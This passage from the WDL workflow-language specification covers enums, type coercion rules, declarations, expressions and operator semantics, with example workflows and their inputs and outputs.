account_number: "FATCAT42",
routing_number: 880521345,
balance: 50.01,
pin_digits: []
}
}
}
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
๐ It is also possible to assign an Object or Map[String, X] value to a Struct declaration. In the either case:
- The value of each
Object/Mapmember must be coercible to the declared type of the struct member. - The
Object/Mapmust at least contain values for all of the struct's non-optional members. - Any
Object/Mapmember that does not correspond to a member of the struct is ignored.
Note that the ability to assign values to Struct declarations other than struct literals is deprecated and will be removed in WDL 2.0.
Enumeration Types (Enums)
An enumeration (or "enum") is a closed set of enumerated values (known as "choices") that are considered semantically valid in a specific context. An enum is defined at the top-level of the WDL document and can be used as a declaration type anywhere in the document.
An enum is defined using the enum keyword, followed by a globally unique name, followed by a comma-delimited list of identifiersโoptionally tagged with valuesโin braces. When referring to a choice within an enum, for example, when assigning to an enum declaration, the <name>.<choice> syntax should be used.
enum FileKind {
FASTQ,
BAM
}
task process_file {
input {
File infile
FileKind kind = FileKind.FASTQ
}
command <<<
echo "Processing ~{kind} file"
...
>>>
}
workflow process_files {
input {
Array[File] files
FileKind kind
}
scatter (file in files) {
call process_file {
input:
infile = file,
kind = kind
}
}
}
As an example, consider a workflow that processes different types of NGS files and has a file_kind input parameter that is expected to be either "FASTQ" or "BAM". Using String as the type of file_kind is not ideal - if the user specifies an invalid value, the error will not be caught until runtime, perhaps after the workflow has already run for several hours. Alternatively, using an enum type for file_kind restricts the allowed values such that the execution engine can validate the input prior to executing the workflow.
Enums are valued, meaning that each choice within an enum has an associated value. Enum values can be of any WDL type, including primitive types (String, Int, Float, Boolean), compound types (Array, Map, Pair, Object), and user-defined types (Struct). To assign a type to the values therein, enums can either be explicitly or implicitly typed.
- Explicitly typed enums take an explicit type assignment within square brackets after the enum's identifier that declares the type of the value. Explicitly typed enums may include values that coerce to the declared type.
- Implicitly typed enums are enums where the values can be unambiguously resolved to a single type following WDL's type coercion rules. If the values do not coerce to a single common type, an error is thrown. Enums that are implicitly typed and for which no values are assigned are assumed to be
Stringvalued with values matching the choice names.
If any non-String values are provided for an enum's choices, then all choices must have explicit values. In the case where all values are String (or the enum is implicitly typed as String), choices without explicit values are automatically assigned a value equal to the choice name.
Enum values must be literal expressions only. This includes string literals (which may contain escape sequences like "\t"), numeric literals, boolean literals, collection literals (Array, Map, Pair), object literals, and struct literals. String interpolation, variable references, and computed expressions are not allowed in enum values, as enums are global declarations that must be evaluable at parse time.
# An explicitly typed enum that is `String`-valued.
enum FruitColors[String] {
Banana = "yellow",
Orange = "orange",
Apple = "red",
}
# An explicitly typed enum that is `Float`-valued. Because the enum is
# explicitly typed, the `ThreePointOh` choice can be coerced to a `Float`,
# which is a valid enumeration definition.
enum FavoriteFloat[Float] {
ThreePointOh = 3,
FourPointOh = 4.0
}
# An implicitly typed enum where the inner type is unambiguously resolved to
# `Float`. Following WDL's type coercion rules, `Int` values coerce to `Float`.
enum FavoriteNumber {
ThreePointOh = 3,
FourPointOh = 4.0
}
# ERROR: the inner type of this enum cannot be unambiguously resolved, as
# `Int` and `String` do not coerce to a common type.
enum InvalidEnum {
Number = 42,
Text = "hello"
}
# ERROR: cannot use computed expressions in enum values
enum Bad1 {
Two = 1 + 1
}
# ERROR: cannot use string interpolation in enum values
enum Bad2 {
Greeting = "Hello ~{world}"
}
# ERROR: cannot use function calls in enum values
enum Bad3 {
Three = length([1, 2, 3])
}
# An implicitly typed enum that is `String`-valued.
enum Whitespace {
Tab = "\t",
Space = " "
}
# An implicitly typed enum that is implied to be `String`-valued with the
# values "FASTQ" and "BAM" respectively.
enum FileKind {
FASTQ,
BAM
}
# An explicitly typed enum with `Array[String]` values. This allows for
# defining sets of related string constants as enum choices.
enum Contigs[Array[String]] {
Canonical = ["chr1", "chr2", "chr3", "chr4", "chr5"],
All = ["chr1", "chr2", "chr3", "chr4", "chr5", "chrM", "chrX", "chrY"]
}
# An implicitly typed enum with `Map[String, Int]` values.
enum DefaultConfig {
Fast = { "threads": 4, "memory_gb": 8 },
Standard = { "threads": 8, "memory_gb": 16 },
HighMem = { "threads": 16, "memory_gb": 64 }
}
Type Name References
A type name reference represents a reference to a custom type by name. When a custom type name appears in an expression context (rather than in a type declaration position), it evaluates to a type name reference. At the time of writing, type name references are only meaningful for enums.
Type name references are evaluated as part of normal expression evaluation, so any expression that evaluates to a type name reference can be used wherever a type name reference is expected. Type name references are primarily used with enums to access enum choices using the member access operator (.). For example, in the expression Color.Red, the identifier Color evaluates to a type name reference to the Color enum type, which can then be accessed to retrieve the Red choice. Since type name references participate in expression evaluation, expressions like (Color).Red are also valid.
There is no postulated use case for struct type name references. Member access on a struct type name reference produces an error. Type name references cannot be coerced to any other type.
enum Priority {
Low,
Medium,
High
}
workflow example {
Priority p1 = Priority.Low # Priority is a type name reference
Priority p2 = (Priority).High # Expression evaluates to type name reference
}
Hidden and Scoped Types
A hidden type is one that may only be instantiated by the execution engine, and cannot be used in a declaration within a WDL file.
A scoped type is one that can only be defined by the execution engine within a specific scope. A scoped type may also be hidden.
The following sections enumerate the hidden and scoped types that are available in the current version of WDL. In WDL 2.0, Object will also become a hidden type.
Union (Hidden Type)
Union is a hidden type that is used for a value that may have any one of several concrete types. A Union value must always be coerced to a concrete type. The Union type is used in the following contexts:
- It is the type of the special
Nonevalue. - It is the return type of some standard library functions, such as
read_json. - It is the type of some
requirementsand reservedhintsattributes.
hints, input, and output (Scoped Types)
The hints section has three scoped types that may be instantiated by the user within that scope.
task (Hidden Scoped Type)
The task type is a hidden type that is available in both pre-evaluation contexts (requirements, hints, and the deprecated runtime sections) with a limited set of members, and in post-evaluation contexts (command and output sections) with the full set of members.
โจ task.previous (Hidden Scoped Type)
The task.previous type is a hidden type that contains the previously computed requirements from the last task attempt. It is scoped to within the task variable and contains the following optional members:
memory: AnInt?with the allocated memory in bytes from the previous attempt.cpu: AFloat?with the allocated number of CPUs from the previous attempt.container: AString?with the URI of the container used in the previous attempt.gpu: AnArray[String]?with the GPU specifications from the previous attempt.fpga: AnArray[String]?with the FPGA specifications from the previous attempt.disks: AMap[String, Int]?with the disk mount points and allocated space from the previous attempt.max_retries: AnInt?with the maximum number of retry attempts from the previous attempt.
All fields are None on the first try.
Type Conversion
WDL has some limited facilities for converting a value of one type to another type. Some of these are explicitly provided by standard library functions, while others are implicit. When converting between types, it is best to be explicit whenever possible, even if an implicit conversion is allowed.
The execution engine is also responsible for converting (or "serializing") input values when constructing commands, as well as "deserializing" command outputs. For more information, see the Command Section and the more extensive Appendix on WDL Value Serialization and Deserialization.
Note that type conversion is non-destructive - the converted value can be considered to be a new value that copies whatever properties of the original value are supported by the target type. If the original value was assigned to a variable, then that variable remains unchanged after the type conversion. For example:
String path = "/path/to/file"
File file = path
String new_path = "~{path}_2" # can still use `path` here
Primitive Conversion to String
Primitive types can always be converted to String using string interpolation. See Expression Placeholder Coercion for details.
Example: primitive_to_string.wdl
version 1.3
workflow primitive_to_string {
input {
Int i = 5
}
output {
String istring = "~{i}"
}
}
version 1.3
workflow primitive_to_string {
input {
Int i = 5
}
output {
String istring = "~{i}"
}
}
Example input:
{
"primitive_to_string.i": 3
}
Example output:
{
"primitive_to_string.istring": "3"
}
Type Coercion
There are some pairs of WDL types for which there is an obvious, unambiguous conversion from one to the other. In these cases, WDL provides an automatic conversion (called "coercion") from one type to the other, such that a value of one type typically can be used anywhere the other type is expected.
For example, file paths are always represented as strings, making the conversion from String to File obvious and unambiguous.
Example: string_to_file.wdl
version 1.3
workflow string_to_file {
input {
File infile
}
String path1 = "~{infile}"
# valid - String coerces unambiguously to File
File path2 = path1
output {
Boolean paths_equal = path2 == infile
}
}
version 1.3
workflow string_to_file {
input {
File infile
}
String path1 = "~{infile}"
# valid - String coerces unambiguously to File
File path2 = path1
output {
Boolean paths_equal = path2 == infile
}
}
Example input:
{
"string_to_file.infile": "data/hello.txt"
}
Example output:
{
"string_to_file.paths_equal": true
}
Attempting to use a declaration that is both of the wrong type and for which there is no coercion to the correct type results in an error.
Example: coercion_fail.wdl
version 1.3
workflow coercion_fail {
Array[String] strings = ["/foo/bar"]
Boolean is_true1 = contains(strings, "/foo/bar")
File foobar = "/foo/bar"
# returns `true` - string interpolation creates a string from `foobar`
Boolean is_true2 = contains(strings, "~{foobar}")
# error - `foobar` is not of type `String` and is not coercible to `String`
contains(strings, foobar)
}
version 1.3
workflow coercion_fail {
Array[String] strings = ["/foo/bar"]
Boolean is_true1 = contains(strings, "/foo/bar")
File foobar = "/foo/bar"
# returns `true` - string interpolation creates a string from `foobar`
Boolean is_true2 = contains(strings, "~{foobar}")
# error - `foobar` is not of type `String` and is not coercible to `String`
contains(strings, foobar)
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
The table below lists all globally valid coercions. The "target" type is the type being coerced to (this is often called the "left-hand side" or "LHS" of the coercion) and the "source" type is the type being coerced from (the "right-hand side" or "RHS").
| Target Type | Source Type | Notes/Constraints |
|---|---|---|
File | String | |
Directory | String | |
Float | Int | May cause overflow error |
Y? | X | X must be coercible to Y |
Array[Y] | Array[X] | X must be coercible to Y |
Array[Y] | Array[X]+ | X must be coercible to Y |
Map[X, Z] | Map[W, Y] | W must be coercible to X and Y must be coercible to Z |
Pair[X, Z] | Pair[W, Y] | W must be coercible to X and Y must be coercible to Z |
Struct | Map[String, Y] | Map keys must match Struct member names, and all Struct members types must be coercible from Y |
Map[String, Y] | Struct | All Struct members must be coercible to Y |
Object | Map[String, Y] | |
Map[String, Y] | Object | All object values must be coercible to Y |
Object | Struct | |
Struct | Object | Object keys must match Struct member names, and Object values must be coercible to Struct member types |
Struct | Struct | The two Struct types must have members with identical names and compatible types (see Struct-to-Struct Coercion) |
Enum | String | String value must exactly match one of the enum's choice names |
String | Enum | The enum choice is serialized to its choice name |
The read_lines function presents a special case in which the Array[String] value it returns may be immediately coerced into other Array[P] values, where P is a primitive type. See Appendix A for details and best practices.
Order of Precedence
During string interpolation, there are some operators for which it is possible to coerce the same arguments in multiple different ways. For such operators, it is necessary to define the order of precedence so that a single function prototype can be selected from among the available options for any given set of arguments.
The + operator is overloaded for both numeric addition and String concatenation. This can lead to the following kinds of situations:
String s = "1.0"
Float f = 2.0
String x = "~{s + f}"
There are two possible ways to evaluate the s + f expression:
- Coerce
stoFloatand perform floating point addition, then coerce toStringwith the result beingx = "3.0". - Coerce
ftoStringand perform string concatenation with result beingx = "1.02.0".
Similarly, the equality/inequality operators can be applied to any primitive values.
When applying +, =, or != to primitive operands (X, Y), the order of precedence is:
- (
Int,Int) or (Float,Float): perform numeric addition/comparison - (
Int,Float): coerceInttoFloat, then perform numeric addition/comparison - (
String,String): perform string concatenation/comparison - (
String,Y): coerceYtoString, then perform string concatenation/comparison - Others: coerce
XandYtoString, then perform string concatenation/comparison
Examples:
# Evaluates to `"3.0"`: `1` is coerced to Float (`1.0`), then numeric addition
# is performed, and the result is converted to a string
String s1 = "~{1 + 2.0}"
# Evaluates to `"3.01"`: `1` is coerced to String, then concatenated with the
# value of `s1`
String s2 = "~{s1 + 1}"
# Evaluates to `true`: `1` is coerced to Float (`1.0`), then numeric comparison
# is performed
Boolean b1 = 1 == 1.0
# Evaluates to `true`: `true` is coerced to String, then string comparison is
# performed
Boolean b2 = true == "true"
# Evaluates to `false`: `1` and `true` are both coerced to String, then string
# comparison is performed
Boolean b3 = 1 == true
Coercion of Optional Types
A non-optional type T can always be coerced to an optional type T?, but the reverse is not true - coercion from T? to T is not allowed because the latter cannot accept None.
This constraint propagates into compound types. For example, an Array[T?] can contain both optional and non-optional elements. This facilitates the common idiom select_first([expr, default]), where expr is of type T? and default is of type T, for converting an optional type to a non-optional type. However, an Array[T?] could not be passed to the sep function, which requires an Array[T].
There are two exceptions where coercion from T? to T is allowed:
Struct/Object Coercion from Map
Structs and Objects can be coerced from map literals, but beware the difference between Map keys (expressions) and Struct/Object member names.
Example: map_to_struct.wdl
version 1.3
struct Words {
Int a
Int b
Int c
}
workflow map_to_struct {
String a = "beware"
String b = "key"
String c = "lookup"
output {
# What are the keys to this Struct?
Words literal_syntax = Words {
a: 10,
b: 11,
c: 12
}
# What are the keys to this Struct?
Words map_coercion = {
"a": 10,
"b": 11,
"c": 12
}
}
}
version 1.3
struct Words {
Int a
Int b
Int c
}
workflow map_to_struct {
String a = "beware"
String b = "key"
String c = "lookup"
output {
# What are the keys to this Struct?
Words literal_syntax = Words {
a: 10,
b: 11,
c: 12
}
# What are the keys to this Struct?
Words map_coercion = {
"a": 10,
"b": 11,
"c": 12
}
}
}
Example input:
{}
Example output:
{
"map_to_struct.literal_syntax": {
"a": 10,
"b": 11,
"c": 12
},
"map_to_struct.map_coercion": {
"a": 10,
"b": 11,
"c": 12
}
}
- If a
Struct(orObject) declaration is initialized using the struct-literal (or object-literal) syntaxWords literal_syntax = Words { a: ...then the keys will be"a","b"and"c". - If a
Struct(orObject) declaration is initialized using the map-literal syntaxWords map_coercion = { a: ...then the keys are expressions, and thusawill be a variable reference to the previously definedString a = "beware".
Struct-to-Struct Coercion
Two Struct types are considered compatible when the following are true:
- They have the same number of members.
- Their members' names are identical.
- The type of each member in the source struct is coercible to the type of the member with the same name in the target struct.
Example: struct_to_struct.wdl
version 1.3
struct A {
String s
}
struct B {
A a_struct
Int i
}
struct C {
String s
}
struct D {
C a_struct
Int i
}
workflow struct_to_struct {
B my_b = B {
a_struct: A { s: 'hello' },
i: 10
}
# We can coerce `my_b` from type `B` to type `D` because `B` and `D`
# have members with the same names and compatible types. Type `A` can
# be coerced to type `C` because they also have members with the same
# names and compatible types.
output {
D my_d = my_b
}
}
version 1.3
struct A {
String s
}
struct B {
A a_struct
Int i
}
struct C {
String s
}
struct D {
C a_struct
Int i
}
workflow struct_to_struct {
B my_b = B {
a_struct: A { s: 'hello' },
i: 10
}
# We can coerce `my_b` from type `B` to type `D` because `B` and `D`
# have members with the same names and compatible types. Type `A` can
# be coerced to type `C` because they also have members with the same
# names and compatible types.
output {
D my_d = my_b
}
}
Example input:
{}
Example output:
{
"struct_to_struct.my_d": {
"a_struct": {
"s": "hello"
},
"i": 10
}
}
๐ Limited Exceptions
Implementers may choose to allow limited exceptions to the above rules, with the understanding that workflows depending on these exceptions may not be portable. These exceptions are provided for backward-compatibility, are considered deprecated, and will be removed in a future version of WDL.
FloattoInt, when the coercion can be performed with no loss of precision, e.g.1.0 -> 1.StringtoInt/Float, when the coercion can be performed with no loss of precision.X?may be coerced toX, and an error is raised if the value is undefined.Array[X]toArray[X]+, when the array is non-empty (an error is raised otherwise).Map[W, X]toArray[Pair[Y, Z]], in the case whereWis coercible toYandXis coercible toZ.Array[Pair[W, X]]toMap[Y, Z], in the case whereWis coercible toYandXis coercible toZ.MaptoObject, in the case ofMap[String, X].Mapto struct, in the case ofMap[String, X]where all members of the struct have typeX.ObjecttoMap[String, X], in the case where all object values are of (or are coercible to) the same type.
Declarations
A declaration reserves a name that can be referenced anywhere in the scope where it is declared. A declaration has a type, a name, and an optional initialization. Each declaration must be unique within its scope, may not collide with a reserved WDL keyword (e.g., workflow, or input), and may not have the same name as a visible struct or enum type.
A task or workflow may declare input parameters within its input section and output parameters within its output section. If a non-optional input declaration does not have an initialization, it is considered a "required" parameter, and its value must be provided by the user before the workflow or task may be run. Declarations may also appear in the body of a task or workflow. All non-input declarations must be initialized.
Example: declarations.wdl
version 1.3
workflow declarations {
input {
# these "unbound" declarations are only allowed in the input section
File? x # optional - defaults to None
Map[String, String] m # required
# this is a "bound" declaration
String y = "abc"
}
Int i = 1 + 2 # Private declarations must be bound
output {
Float pi = i + .14 # output declarations must also be bound
}
}
version 1.3
workflow declarations {
input {
# these "unbound" declarations are only allowed in the input section
File? x # optional - defaults to None
Map[String, String] m # required
# this is a "bound" declaration
String y = "abc"
}
Int i = 1 + 2 # Private declarations must be bound
output {
Float pi = i + .14 # output declarations must also be bound
}
}
Example input:
{
"declarations.m": {"a": "b"}
}
Example output:
{
"declarations.pi": 3.14
}
A declaration may be initialized with an expression, which includes the ability to refer to elements that are outputs of tasks.
Example: task_outputs.wdl
version 1.3
task greet {
input {
String name
}
command <<<
printf "Hello ~{name}"
>>>
output {
String greeting = read_string(stdout())
}
}
task count_lines {
input {
Array[String] array
}
command <<<
wc -l < ~{write_lines(array)}
>>>
output {
Int line_count = read_int(stdout())
}
}
workflow task_outputs {
call greet as x {
name="John"
}
call greet as y {
name="Sarah"
}
Array[String] greetings = [x.greeting, y.greeting]
call count_lines {
array=greetings
}
output {
Int num_greetings = count_lines.line_count
}
}
version 1.3
task greet {
input {
String name
}
command <<<
printf "Hello ~{name}"
>>>
output {
String greeting = read_string(stdout())
}
}
task count_lines {
input {
Array[String] array
}
command <<<
wc -l < ~{write_lines(array)}
>>>
output {
Int line_count = read_int(stdout())
}
}
workflow task_outputs {
call greet as x {
name="John"
}
call greet as y {
name="Sarah"
}
Array[String] greetings = [x.greeting, y.greeting]
call count_lines {
array=greetings
}
output {
Int num_greetings = count_lines.line_count
}
}
Example input:
{}
Example output:
{
"task_outputs.num_greetings": 2
}
In this example, greetings is undefined until both call greet as x and call greet as y have successfully completed, at which point it is assigned the result of evaluating its expression. If either of the two tasks fail, the workflow would also fail and greetings would never be initialized.
It must be possible to organize all of the statements within a scope into a directed acyclic graph (DAG); thus, circular references between declarations are not allowed. The following example would result in an error due to the presence of a circular reference.
Example: circular.wdl
version 1.3
workflow circular {
Int i = j + 1
Int j = i - 2
}
version 1.3
workflow circular {
Int i = j + 1
Int j = i - 2
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Expressions
An expression is a compound statement that consists of literal values, identifiers (references to declarations or call outputs), built-in operators (e.g., + or >=), and calls to standard library functions.
A "literal" expression is one that consists only of a literal value. For example, "foo" is a literal String expression and [1, 2, 3] is a literal Array[Int] expression.
A "simple" expression is one that can be evaluated unambiguously without any knowledge of the runtime context. Literal expressions, operations on literals (e.g., 1 + 2), and function calls with literal arguments (excluding any functions that read or create Files) are all simple expressions. A simple expression cannot refer to any declarations (i.e., it cannot contain identifiers). An execution engine may choose to replace a simple expression with its literal value during static analysis.
Example: expressions_task.wdl
version 1.3
task expressions {
input {
Int x
}
command <<<
printf "hello" > hello.txt
>>>
output {
# simple expressions
Float f = 1 + 2.2
Boolean b = if 1 > 2 then true else false
Map[String, Int] m = as_map(zip(["a", "b", "c"], [1, 2, 3]))
# non-simple expressions
Int i = x + 3 # requires knowing the value of x
# requires reading a file that might only exist at runtime
String s = read_string("hello.txt")
}
}
version 1.3
task expressions {
input {
Int x
}
command <<<
printf "hello" > hello.txt
>>>
output {
# simple expressions
Float f = 1 + 2.2
Boolean b = if 1 > 2 then true else false
Map[String, Int] m = as_map(zip(["a", "b", "c"], [1, 2, 3]))
# non-simple expressions
Int i = x + 3 # requires knowing the value of x
# requires reading a file that might only exist at runtime
String s = read_string("hello.txt")
}
}
Example input:
{
"expressions.x": 5
}
Example output:
{
"expressions.f": 3.2,
"expressions.b": false,
"expressions.m": {
"a": 1,
"b": 2,
"c": 3
},
"expressions.i": 8,
"expressions.s": "hello"
}
Built-in Operators
WDL provides the standard unary and binary mathematical and logical operators. The following tables list the valid operand and result type combinations for each operator. Using an operator with unsupported types results in an error.
In operations on mismatched numeric types (e.g., Int + Float), the Int is first is coerced to Float, and the result type is Float. This may result in loss of precision, for example if the Int is too large to be represented exactly by a Float. A Float can be converted to Int with the ceil, round, or floor functions.
Unary Operators
| Operator | RHS Type | Result |
|---|---|---|
- | Float | Float |
- | Int | Int |
! | Boolean | Boolean |
Binary Operators on Primitive Types
| LHS Type | Operator | RHS Type | Result | Semantics |
|---|---|---|---|---|
Boolean | == | Boolean | Boolean | |
Boolean | != | Boolean | Boolean | |
Boolean | || | Boolean | Boolean | |
Boolean | && | Boolean | Boolean | |
๐ Boolean | > | Boolean | Boolean | true is greater than false |
๐ Boolean | >= | Boolean | Boolean | true is greater than false |
๐ Boolean | < | Boolean | Boolean | true is greater than false |
๐ Boolean | <= | Boolean | Boolean | true is greater than false |
Int | + | Int | Int | |
Int | - | Int | Int | |
Int | * | Int | Int | |
Int | / | Int | Int | Integer division |
Int | ** | Int | Int | Integer exponentiation |
Int | % | Int | Int | Integer division, return remainder |
Int | == | Int | Boolean | |
Int | != | Int | Boolean | |
Int | > | Int | Boolean | |
Int | >= | Int | Boolean | |
Int | < | Int | Boolean | |
Int | <= | Int | Boolean | |
๐ Int | + | String | String | |
Int | + | Float | Float | |
Int | - | Float | Float | |
Int | * | Float | Float | |
Int | / | Float | Float | |
Int | ** | Float | Float | |
Int | == | Float | Boolean | |
Int | != | Float | Boolean | |
Int | > | Float | Boolean | |
Int | >= | Float | Boolean | |
Int | < | Float | Boolean | |
Int | <= | Float | Boolean | |
Float | + | Float | Float | |
Float | - | Float | Float | |
Float | * | Float | Float | |
Float | / | Float | Float | |
Float | ** | Float | Float | |
Float | % | Float | Float | |
Float | == | Float | Boolean | |
Float | != | Float | Boolean | |
Float | > | Float | Boolean | |
Float | >= | Float | Boolean | |
Float | < | Float | Boolean | |
Float | <= | Float | Boolean | |
๐ Float | + | String | String | |
Float | + | Int | Float | |
Float | - | Int | Float | |
Float | * | Int | Float | |
Float | / | Int | Float | |
Float | ** | Int | Float | |
Float | % | Int | Float | |
Float | == | Int | Boolean | |
Float | != | Int | Boolean | |
Float | > | Int | Boolean | |
Float | >= | Int | Boolean | |
Float | < | Int | Boolean | |
Float | <= | Int | Boolean | |
String | + | String | String | Concatenation |
String | + | File | File | |
String | == | String | Boolean | Unicode comparison |
String | != | String | Boolean | Unicode comparison |
String | > | String | Boolean | Unicode comparison |
String | >= | String | Boolean | Unicode comparison |
String | < | String | Boolean | Unicode comparison |
String | <= | String | Boolean | Unicode comparison |
๐ String | + | Int | String | |
๐ String | + | Float | String | |
File | == | File | Boolean | |
File | != | File | Boolean | |
File | == | String | Boolean | |
File | != | String | Boolean | |
๐ File | + | File | File | append file paths - error if second path is not relative |
๐ File | + | String | File | append file paths - error if second path is not relative |
Directory | == | Directory | Boolean | |
Directory | != | Directory | Boolean | |
Directory | == | String | Boolean | |
Directory | != | String | Boolean |
Boolean operator evaluation is minimal (or "short-circuiting"), meaning that:
- For
A && B, ifAevalutes tofalsethenBis not evaluated - For
A || B, ifAevaluates totruethenBis not evaluated.
WDL Strings are compared by the unicode values of their corresponding characters. Character a is less than character b if it has a lower unicode value.
File and Directory values are canonicalized when the value is created. Two File or Directory values that refer to the same underlying resource are considered equal, even if they were initialized from different string representations. For example, /home/user/file.txt and /home/user/../user/file.txt refer to the same file and compare as equal. Similarly, for Directory values, trailing slashes are ignored when determining equality (e.g., /home/user/dir and /home/user/dir/ are equal). Equality relationships between File and Directory values are preserved throughout workflow execution, including before and after task input localization.
When comparing a File or Directory to a String, the String is first coerced to File or Directory (and thus canonicalized) before the comparison is performed.
Example: file_directory_equality.wdl
version 1.3
task check_equality {
input {
File file_a
File file_b
Directory dir_a
Directory dir_b
}
command <<<
# The execution engine localizes equal files once
# so file_a and file_b will have the same path
if [ "~{file_a}" = "~{file_b}" ]; then
echo "true" > files_equal.txt
else
echo "false" > files_equal.txt
fi
if [ "~{dir_a}" = "~{dir_b}" ]; then
echo "true" > dirs_equal.txt
else
echo "false" > dirs_equal.txt
fi
>>>
output {
Boolean task_files_equal = read_boolean("files_equal.txt")
Boolean task_dirs_equal = read_boolean("dirs_equal.txt")
}
}
workflow file_directory_equality {
input {
File file_a
File file_b
Directory dir_a
Directory dir_b
}
# After canonicalization, these compare as equal
Boolean files_eq = file_a == file_b
Boolean dirs_eq = dir_a == dir_b
call check_equality {
file_a = file_a,
file_b = file_b,
dir_a = dir_a,
dir_b = dir_b
}
output {
Boolean workflow_files_equal = files_eq
Boolean workflow_dirs_equal = dirs_eq
Boolean task_files_equal = check_equality.task_files_equal
Boolean task_dirs_equal = check_equality.task_dirs_equal
}
}
version 1.3
task check_equality {
input {
File file_a
File file_b
Directory dir_a
Directory dir_b
}
command <<<
# The execution engine localizes equal files once
# so file_a and file_b will have the same path
if [ "~{file_a}" = "~{file_b}" ]; then
echo "true" > files_equal.txt
else
echo "false" > files_equal.txt
fi
if [ "~{dir_a}" = "~{dir_b}" ]; then
echo "true" > dirs_equal.txt
else
echo "false" > dirs_equal.txt
fi
>>>
output {
Boolean task_files_equal = read_boolean("files_equal.txt")
Boolean task_dirs_equal = read_boolean("dirs_equal.txt")
}
}
workflow file_directory_equality {
input {
File file_a
File file_b
Directory dir_a
Directory dir_b
}
# After canonicalization, these compare as equal
Boolean files_eq = file_a == file_b
Boolean dirs_eq = dir_a == dir_b
call check_equality {
file_a = file_a,
file_b = file_b,
dir_a = dir_a,
dir_b = dir_b
}
output {
Boolean workflow_files_equal = files_eq
Boolean workflow_dirs_equal = dirs_eq
Boolean task_files_equal = check_equality.task_files_equal
Boolean task_dirs_equal = check_equality.task_dirs_equal
}
}
Example input:
{
"file_directory_equality.file_a": "data/hello.txt",
"file_directory_equality.file_b": "data/../data/hello.txt",
"file_directory_equality.dir_a": "data/testdir/",
"file_directory_equality.dir_b": "data/testdir"
}
Example output:
{
"file_directory_equality.workflow_files_equal": true,
"file_directory_equality.workflow_dirs_equal": true,
"file_directory_equality.task_files_equal": true,
"file_directory_equality.task_dirs_equal": true
}
In this example, file_a and file_b use different string representations (tests/data/hello.txt vs tests/data/../data/hello.txt) but both canonicalize to the same path and compare as equal at workflow scope. When passed to the task, the execution engine localizes the file once, and both file_a and file_b in the task reference the same localized path. Similarly, dir_a includes a trailing slash while dir_b does not, but they canonicalize to the same directory and are localized once.
Except for String + File, all concatenations between String and non-String types are deprecated and will be removed in WDL 2.0. The same effect can be achieved using string interpolation.
Equality of Compound Types
| LHS Type | Operator | RHS Type | Result |
|---|---|---|---|
Array | == | Array | Boolean |
Array | != | Array | Boolean |
Map | == | Map | Boolean |
Map | != | Map | Boolean |
Pair | == | Pair | Boolean |
Pair | != | Pair | Boolean |
Struct | == | Struct | Boolean |
Struct | != | Struct | Boolean |
Object | == | Object | Boolean |
Object | != | Object | Boolean |
In general, two compound values are equal if-and-only-if all of the following are true:
- They are of the same type.
- They are the same length.
- All of their contained elements are equal.
Since Arrays and Maps are ordered, the order of their elements are also compared. For example:
Example: array_map_equality.wdl
version 1.3
workflow array_map_equality {
output {
# arrays and maps with the same elements in the same order are equal
Boolean is_true1 = [1, 2, 3] == [1, 2, 3]
Boolean is_true2 = {"a": 1, "b": 2} == {"a": 1, "b": 2}
# arrays and maps with the same elements in different orders are not equal
Boolean is_false1 = [1, 2, 3] == [2, 1, 3]
Boolean is_false2 = {"a": 1, "b": 2} == {"b": 2, "a": 1}
}
}
version 1.3
workflow array_map_equality {
output {
# arrays and maps with the same elements in the same order are equal
Boolean is_true1 = [1, 2, 3] == [1, 2, 3]
Boolean is_true2 = {"a": 1, "b": 2} == {"a": 1, "b": 2}
# arrays and maps with the same elements in different orders are not equal
Boolean is_false1 = [1, 2, 3] == [2, 1, 3]
Boolean is_false2 = {"a": 1, "b": 2} == {"b": 2, "a": 1}
}
}
Example input:
{}
Example output:
{
"array_map_equality.is_true1": true,
"array_map_equality.is_true2": true,
"array_map_equality.is_false1": false,
"array_map_equality.is_false2": false
}
Type coercion can be employed to compare values of different but compatible types.
Example: compare_coerced.wdl
version 1.3
workflow compare_coerced {
Array[Int] i = [1, 2, 3]
Array[Float] f1 = i
Array[Float] f2 = [1.0, 2.0, 3.0]
output {
# Ints are automatically coerced to Floats for comparison
Boolean is_true = f1 == f2
}
}
version 1.3
workflow compare_coerced {
Array[Int] i = [1, 2, 3]
Array[Float] f1 = i
Array[Float] f2 = [1.0, 2.0, 3.0]
output {
# Ints are automatically coerced to Floats for comparison
Boolean is_true = f1 == f2
}
}
Example input:
{}
Example output:
{
"compare_coerced.is_true": true
}
Equality and Inequality Comparison of Optional Types
The equality and inequality operators are exceptions to the general rules on coercion of optional types. Either or both operands of an equality or inequality comparison can be optional, considering that None is equal to itself but no other value.
Example: compare_optionals.wdl
version 1.3
workflow compare_optionals {
Int i = 1
Int? j = 1
Int? k = None
output {
# equal values of the same type are equal even if one is optional
Boolean is_true1 = i == j
# k is undefined (None), and so is only equal to None
Boolean is_true2 = k == None
# these comparisons are valid and evaluate to false
Boolean is_false1 = i == k
Boolean is_false2 = j == k
}
}
version 1.3
workflow compare_optionals {
Int i = 1
Int? j = 1
Int? k = None
output {
# equal values of the same type are equal even if one is optional
Boolean is_true1 = i == j
# k is undefined (None), and so is only equal to None
Boolean is_true2 = k == None
# these comparisons are valid and evaluate to false
Boolean is_false1 = i == k
Boolean is_false2 = j == k
}
}
Example input:
{}
Example output:
{
"compare_optionals.is_true1": true,
"compare_optionals.is_true2": true,
"compare_optionals.is_false1": false,
"compare_optionals.is_false2": false
}
Operator Precedence Table
| Precedence | Operator type | Associativity | Example |
|---|---|---|---|
| 12 | Grouping | n/a | (x) |
| 11 | Member Access | left-to-right | x.y |
| 10 | Index | left-to-right | x[y] |
| 9 | Function Call | left-to-right | x(y,z,...) |
| 8 | Logical NOT | right-to-left | !x |
| Unary Negation | right-to-left | -x | |
| 7 | Exponentiation | left-to-right | x**y |
| 6 | Multiplication | left-to-right | x*y |
| Division | left-to-right | x/y | |
| Remainder | left-to-right | x%y | |
| 5 | Addition | left-to-right | x+y |
| Subtraction | left-to-right | x-y | |
| 4 | Less Than | left-to-right | x<y |
| Less Than Or Equal | left-to-right | x<=y | |
| Greater Than | left-to-right | x>y | |
| Greater Than Or Equal | left-to-right | x>=y | |
| 3 | Equality | left-to-right | x==y |
| Inequality | left-to-right | x!=y | |
| 2 | Logical AND | left-to-right | x&&y |
| 1 | Logical OR | left-to-right | x||y |
Member Access
The syntax x.y refers to member access. The left-hand side x is evaluated as an expression and must be one of the following:
- A
